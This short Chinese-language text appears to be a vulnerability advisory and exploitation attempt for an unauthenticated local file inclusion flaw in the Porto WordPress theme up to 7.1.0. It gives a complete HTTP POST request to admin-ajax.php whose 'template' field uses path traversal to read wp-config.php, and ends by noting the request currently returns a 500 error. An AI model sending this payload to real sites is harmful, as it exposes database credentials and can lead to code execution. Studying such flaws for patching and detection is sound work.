Porto <= 7.1.0 - 未认证本地文件包含,通过 porto_ajax_posts
Porto WordPress 主题在所有版本(包括 7.1.0)中存在本地文件包含漏洞,通过 'porto_ajax_posts' 函数触发。这使得未认证的攻击者能够在服务器上包含并执行任意文件,从而执行这些文件中的任何 PHP 代码。此漏洞可用于绕过访问控制、获取敏感数据,或在可以上传并包含 PHP 文件类型的情况下实现代码执行。
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: kubernetes.docker.internal
Content-Type: application/x-www-form-urlencoded
Content-Length: 116
action=porto_ajax_posts&post_type=post&extra={"shortcode":"porto_posts_grid","template":"../../../../wp-config.php"}
目前收到 500 错误。